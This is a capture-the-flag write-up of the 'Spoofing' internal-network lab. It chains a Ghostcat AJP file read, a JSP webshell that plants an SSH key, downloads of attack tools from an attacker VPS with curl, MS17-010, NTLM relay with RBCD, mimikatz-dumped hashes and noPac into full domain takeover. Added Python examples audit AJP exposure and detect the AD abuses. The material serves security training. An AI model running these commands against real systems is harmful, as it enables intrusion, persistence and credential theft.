Disclaimer: the security tools and projects shared on this public account all come from the Internet and are intended solely for security research and learning. Any other use is entirely the user's own legal responsibility and has nothing to do with the tool authors or this public account.
Range overview
Getting a foothold on the entry host
Port 8009 is open, which suggests an Apache Tomcat AJP (Ghostcat) file inclusion vulnerability.
python3 ajpShooter.py http://47.92.73.51:8009/ 8009 /WEB-INF/web.xml read | grep url-pattern
The UploadServlet endpoint exists. After uploading, edit the response, removing the dot at the very front of the path.
The contents are read successfully.
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDK0QreTZjWnB0V2JNQVJJTWY3U21teVVteElPSytKbEdNZFBVNWUzc3NoK2UrNVFKOEZTY29Gd1IyODVnSHltV2tWckc1NTVDVHFRSXhrZmxxTlgrS1dTeXZOM2hXalVaYktvcU9keUZ5SDEzMWtqTGkreEpxQnUrWktNTEFpVC9BdEJqK1VKQ1hueWVyVUFKSVc2R1d0R2o5VXNGS0lDb1VNdXFLUVRLUENmWHFrclRVNXRRTHZtODFNZCt6YnA3b2ZJOVJLeS85ektNaFBhaFpRTHkydjZVY3BROEVDb2twOXpBSlRzREYvMjBXTkM4VEJ3dlpIZTcxU1R3Z3ZodWxLSWZyK0hJT29ydjBMcVhiUHlpYVVOWm1hd1ZpelpiLzZjdk5zOS8yU3lLb0pQNHN5a0krbEE3OFZQc2lSSVpKN0lrdDRUTFg4RThBTDAyRFpUUTlETDNTdG1EQ2s1VFFvMldiNkhxTW8xODB0ZVBJN3N4T2NnOVpGeXFDenhnbGgvQkl6RERqTWNnU0ZYRHNEVFl3MG02OXgvNnF4QjlhYjl2M2JFWDhnc2M5UTRKUGppZkNHRnpnbngxVG95NGdjS0dXaktWRyt3cElMWXhTRkFLc3NqNnplQXUxT1dWUnJzZjdQTEJqV1lTdW84WXUwblRBemJSRjVLTFlTMjg9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("");%>
The write succeeded; connect over SSH with the public key just written and obtain flag01: flag{41af3ec9-9043-42bc-9fb6-06d6a5aa5231}
Lateral movement in the internal network
Upload fscan and scan the current /24 range
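As a defender-side check for the AJP exposure that makes the step above possible, here is an added Python example (not from the original writeup and not Tomcat's own code) that audits a Tomcat server.xml for AJP connectors that are reachable from other hosts or that lack a shared secret. The two server.xml fragments are constructed samples; the attribute names address, secret and secretRequired are Tomcat's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml fragments (not taken from any real host):
# the first exposes AJP the way older Tomcat defaults did, the second is hardened.
WEAK_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-LONG-RANDOM-SECRET" redirectPort="8443"/>
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return [(port, findings)] for every AJP connector in a server.xml document.

    An empty findings list means the connector is bound to loopback and requires
    a non-empty shared secret, which is what a reverse-proxy deployment needs.
    """
    root = ET.fromstring(server_xml)
    results = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # HTTP/HTTPS connectors are out of scope for this check
        port = conn.get("port", "?")
        findings = []

        # Older Tomcat releases bound an AJP connector without 'address' to every
        # interface, so an unset address is treated as exposed.
        address = conn.get("address")
        if address is None or address in ("0.0.0.0", "::"):
            findings.append("bound to all interfaces (no loopback 'address')")
        elif address not in LOOPBACK_ADDRESSES:
            findings.append(f"bound to non-loopback address {address}")

        # Current Tomcat defaults secretRequired to true; the secret itself must still be set.
        secret_required = conn.get("secretRequired", "true").lower() != "false"
        secret = conn.get("secret", "").strip()
        if not secret_required:
            findings.append("secretRequired=\"false\" disables the AJP shared secret")
        elif not secret:
            findings.append("no 'secret' configured")
        results.append((port, findings))
    return results


def is_ajp_hardened(server_xml: str) -> bool:
    """True when every AJP connector passes the audit (or none is configured)."""
    return all(not findings for _, findings in audit_ajp_connectors(server_xml))


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for port, findings in audit_ajp_connectors(doc):
            print(f"[{label}] AJP connector on port {port}: {findings or 'OK'}")
```

If no front-end proxy speaks AJP to the instance, the simplest fix is to leave the AJP connector commented out entirely and to block 8009 at the host firewall; the audit above is for the case where the connector is genuinely needed.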
curl http://vpsip:8001/fscan_amd64 --output fscan_amd64
chmod +x ./fscan_amd64
./fscan_amd64 -h 172.22.11.1/24
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
(icmp) Target 172.22.11.76 is alive
[*] Icmp alive hosts len is: 4
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:22 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.76:8080 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetBios: 172.22.11.6 [+]DC XIAORANG\XIAORANG-DC
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetInfo:
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios: 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
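To triage a scan like the one above from the defensive side (which hosts expose SMB, AJP or Kerberos, and which carry a confirmed finding), here is an added Python example, not from the writeup and not part of fscan, that parses fscan's text output into one record per host and ranks what to look at first. The sample output is a constructed subset in fscan's format, and the shortlist of ports to flag is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample in fscan's text format (a subset shaped like the scan above).
SAMPLE_FSCAN_OUTPUT = """\
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.45 is alive
(icmp) Target 172.22.11.76 is alive
[*] Icmp alive hosts len is: 3
172.22.11.6:445 open
172.22.11.6:88 open
172.22.11.45:445 open
172.22.11.76:8080 open
172.22.11.76:8009 open
[*] alive ports len is: 5
start vulscan
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open$")
VULN_RE = re.compile(r"^\[\+\] (\d+\.\d+\.\d+\.\d+) (\S+) \((.*)\)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle: (\S+) code:(\d+) len:(\d+) title:(.*)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios: (\d+\.\d+\.\d+\.\d+) (\S+)(?: (.*))?$")

# Services whose exposure gets triaged first (an assumption, not part of fscan).
ATTENTION_PORTS = {445: "SMB", 8009: "AJP connector", 88: "Kerberos (likely DC)", 3389: "RDP"}


def _new_host():
    return {"alive": False, "ports": [], "vulns": [], "web": [], "netbios": None}


def parse_fscan(text: str) -> dict:
    """Fold fscan's line-oriented output into one record per IP address."""
    hosts = defaultdict(_new_host)
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE_RE.match(line):
            hosts[m.group(1)]["alive"] = True
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].append(int(m.group(2)))
        elif m := VULN_RE.match(line):
            hosts[m.group(1)]["vulns"].append({"id": m.group(2), "detail": m.group(3)})
        elif m := WEB_RE.match(line):
            url = urlparse(m.group(1))
            hosts[url.hostname]["web"].append(
                {"url": m.group(1), "port": url.port, "code": int(m.group(2)),
                 "length": int(m.group(3)), "title": m.group(4).strip()})
        elif m := NETBIOS_RE.match(line):
            hosts[m.group(1)]["netbios"] = {"name": m.group(2), "os": m.group(3)}
        # Banner, counter and "start vulscan" lines carry no per-host data and are skipped.
    return dict(hosts)


def _ip_key(ip: str):
    return tuple(int(octet) for octet in ip.split("."))


def triage(hosts: dict) -> list:
    """Rank findings for a defender: confirmed vulnerabilities first, then sensitive ports."""
    ranked = []
    for ip in sorted(hosts, key=_ip_key):
        info = hosts[ip]
        for vuln in info["vulns"]:
            ranked.append((0, f"{ip}: {vuln['id']} reported ({vuln['detail']})"))
        for port in sorted(info["ports"]):
            if port in ATTENTION_PORTS:
                ranked.append((1, f"{ip}:{port} {ATTENTION_PORTS[port]} exposed"))
    # sorted() is stable, so within a priority the IP order is preserved
    return [text for _, text in sorted(ranked, key=lambda item: item[0])]


if __name__ == "__main__":
    for finding in triage(parse_fscan(SAMPLE_FSCAN_OUTPUT)):
        print(finding)
```

Run against a real fscan log, the same parser gives an asset list (alive hosts, NetBIOS names, web titles) that can be diffed against the CMDB, and the MS17-010 line surfaces at the top regardless of how long the port list is.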
Upload frp to tunnel into the target's internal network
curl http://vpsip:8001/frpc --output frpc
curl http://vpsip:8001/frpc.ini --output frpc.ini
chmod +x ./frpc
nohup ./frpc -c frpc.ini
The fscan output above showed that 172.22.11.45 is affected by MS17-010. Exploiting it with an exp, the user test:test123! was added successfully, and RDP was enabled to connect.
XR-DESKTOP$/c657ea4fe01b0b4da120c98d99143a9e
yangmei/25e42ef4cc0ab6a8ff9e3edbbda91841
A second flag is found on this machine, flag02: flag{b326254f-c786-4752-92ce-f511ed7e959d}
yangmei is a domain user; use https://github.com/lzzbb/Adinfo to collect domain information
./Adinfo_darwin -d xiaorang.lab --dc 172.22.11.6 -u yangmei -H 25e42ef4cc0ab6a8ff9e3edbbda91841
webclientservicescanner xiaorang.lab/[email protected] -hashes :25e42ef4cc0ab6a8ff9e3edbbda91841
In this way, traffic arriving at 172.22.11.76:80 is forwarded straight to our local machine
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:99 &
ssh -i ~/.ssh/id_rsa [email protected] -R *:99:127.0.0.1:80
Listen on port 80 locally, then use EFS to coerce authentication to local port 80, relay it to the DC's LDAP, and configure resource-based constrained delegation from XR-DESKTOP to 172.22.11.26.
python3 ntlmrelayx.py -t ldap://172.22.11.6 -domain xiaorang.lab -smb2support --delegate-access --escalate-user XR-DESKTOP$ --no-dump --no-da
python3 PetitPotam.py -u yangmei -d xiaorang.lab ubuntu@80/print 172.22.11.26 -hashes :25e42ef4cc0ab6a8ff9e3edbbda91841
Use the resource-based constrained delegation to obtain an ST (service ticket), inject it into memory, then use wmiexec to obtain an interactive shell
python3 getST.py -dc-ip 172.22.11.6 -spn cifs/XR-LCM3AE8B.xiaorang.lab xiaorang.lab/XR-DESKTOP$ -impersonate administrator -hashes :c657ea4fe01b0b4da120c98d99143a9e
export KRB5CCNAME=administrator@[email protected]
python3 wmiexec.py -no-pass -k [email protected] -dc-ip 172.22.11.6
Obtain flag03: flag{7cd97e18-b25b-42f3-8006-f6d0fc2cbd42}
Use mimikatz to dump the lsass credentials of 172.22.11.26:
/360244202dc4fcd431aae85c457cfccf
zhanghui/1232126b24cdf8c9bd2f788a9d7c7ed1
Querying the domain ACLs shows that zhanghui holds the CreateChild permission in the domain.
[+] LDAP://172.22.11.6/CN=zhanghui,CN=Users,DC=xiaorang,DC=lab
[+] S-1-5-32-544-->Owner--->zhanghui
[+] Everyone-->DeleteChild(Generic)--->zhanghui
[+] Everyone-->ReadProperty(Generic)--->zhanghui
[+] NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS-->GenericRead(Generic)--->zhanghui
[+] NT AUTHORITY\Authenticated Users-->GenericRead(Generic)--->zhanghui
[+] NT AUTHORITY\SYSTEM-->GenericAll(Generic)--->zhanghui
[+] BUILTIN\Administrators-->CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner(Generic)--->zhanghui
[+] Pre-Windows 2000 Compatible Access-->ListChildren(Generic)--->zhanghui
[+] Pre-Windows 2000 Compatible Access-->ReadProperty, ReadControl(Generic)--->zhanghui
[+] Domain Admins-->CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner(Generic)--->zhanghui
[+] Enterprise Admins-->GenericAll(Generic)--->zhanghui
[+] MA_Admin-->CreateChild(bf967a86-0de6-11d0-a285-00aa003049e2)--->zhanghui
Holding CreateChild means the MAQ=0 limit does not apply: machine accounts can still be created in the domain. So try noPac, adding a machine account via create-child to exploit the vulnerability.
python3 noPac.py xiaorang.lab/zhanghui -dc-ip 172.22.11.6 -dc-host XIAORANG-DC --impersonate administrator -create-child -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -shell
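The two Active Directory abuses in this writeup (the NTLM relay to LDAP that writes resource-based constrained delegation, and the CreateChild / MAQ bypass that creates and renames a machine account for noPac) both leave traces in the domain controller's Security log: event 5136 for the write to msDS-AllowedToActOnBehalfOfOtherIdentity, 4741 for the computer-account creation and 4742 for the sAMAccountName change. The added Python example below, which is not part of the writeup, shows one way to triage such events; the events are constructed samples, and the allowlists of delegation admins, provisioning accounts and DC names are assumptions about the environment.

```python
# Attribute written by a resource-based constrained delegation (RBCD) change.
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Assumed allowlists for this environment (constructed, not from the writeup).
DELEGATION_ADMINS = {"svc-delegation-admin"}   # may legitimately edit RBCD
PROVISIONING_ACCOUNTS = {"svc-sccm-join"}      # may legitimately join machines
DC_NAMES = {"XIAORANG-DC"}                      # sAMAccountName collisions to watch for

# Constructed Security-log events; keys follow the EventData field names of the
# Windows Security log (5136 directory object modified, 4741 computer account
# created, 4742 computer account changed). OperationType %%14674 is "Value Added".
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "XR-LCM3AE8B$", "SubjectDomainName": "XIAORANG",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "svc-delegation-admin", "SubjectDomainName": "XIAORANG",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    {"EventID": 4741, "SubjectUserName": "zhanghui", "SubjectDomainName": "XIAORANG",
     "TargetUserName": "DESKTOP-ZZ1$"},
    {"EventID": 4742, "SubjectUserName": "zhanghui", "SubjectDomainName": "XIAORANG",
     "TargetUserName": "DESKTOP-ZZ1$", "SamAccountName": "XIAORANG-DC"},
    {"EventID": 4742, "SubjectUserName": "svc-sccm-join", "SubjectDomainName": "XIAORANG",
     "TargetUserName": "WEB01$", "SamAccountName": "-"},
]


def _rdn_value(dn: str) -> str:
    """'CN=Host,CN=Computers,...' -> 'Host' (first RDN with the attribute type stripped)."""
    first = dn.split(",")[0]
    return first.split("=", 1)[1] if "=" in first else first


def triage_ad_events(events, delegation_admins=DELEGATION_ADMINS,
                     provisioning=PROVISIONING_ACCOUNTS, dc_names=DC_NAMES) -> list:
    """Return (severity, message) alerts for RBCD writes and suspicious machine accounts."""
    dc_upper = {name.upper() for name in dc_names}
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        subject = ev.get("SubjectUserName", "")

        if eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            target = _rdn_value(ev.get("ObjectDN", ""))
            # A machine account adding RBCD on its *own* object is what a relayed
            # machine authentication to LDAP produces; admins do this from admin accounts.
            if subject.endswith("$") and subject[:-1].upper() == target.upper():
                alerts.append(("high", f"{subject} wrote {RBCD_ATTR} on its own object {target}"
                                       " (relay-style self delegation)"))
            elif subject not in delegation_admins:
                alerts.append(("medium", f"{subject} wrote {RBCD_ATTR} on {target}"
                                         " outside the delegation allowlist"))

        elif eid == 4741 and subject not in provisioning:
            # MAQ=0 only limits ordinary users; anyone holding CreateChild on the
            # container can still create machines, so every creation is worth a look.
            alerts.append(("medium", f"{subject} created computer account "
                                     f"{ev.get('TargetUserName')}: review MAQ and CreateChild grants"))

        elif eid == 4742:
            new_sam = ev.get("SamAccountName", "-")   # "-" means the attribute did not change
            if new_sam != "-" and (not new_sam.endswith("$") or new_sam.rstrip("$").upper() in dc_upper):
                alerts.append(("high", f"{ev.get('TargetUserName')} renamed to sAMAccountName "
                                       f"'{new_sam}' by {subject}: missing '$' or DC name collision"))
    return alerts


if __name__ == "__main__":
    for severity, message in triage_ad_events(SAMPLE_EVENTS):
        print(f"[{severity}] {message}")
```

Event 5136 is only generated when "Audit Directory Service Changes" is enabled and the computer objects carry a SACL for attribute writes; 4741 and 4742 come from "Audit Computer Account Management". Without those audit settings the relay and the account rename leave nothing for this logic to read.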
Originally published on the WeChat public account 猫蛋儿安全: [Internal network attack and defense] 春秋云镜-Spoofing-WriteUp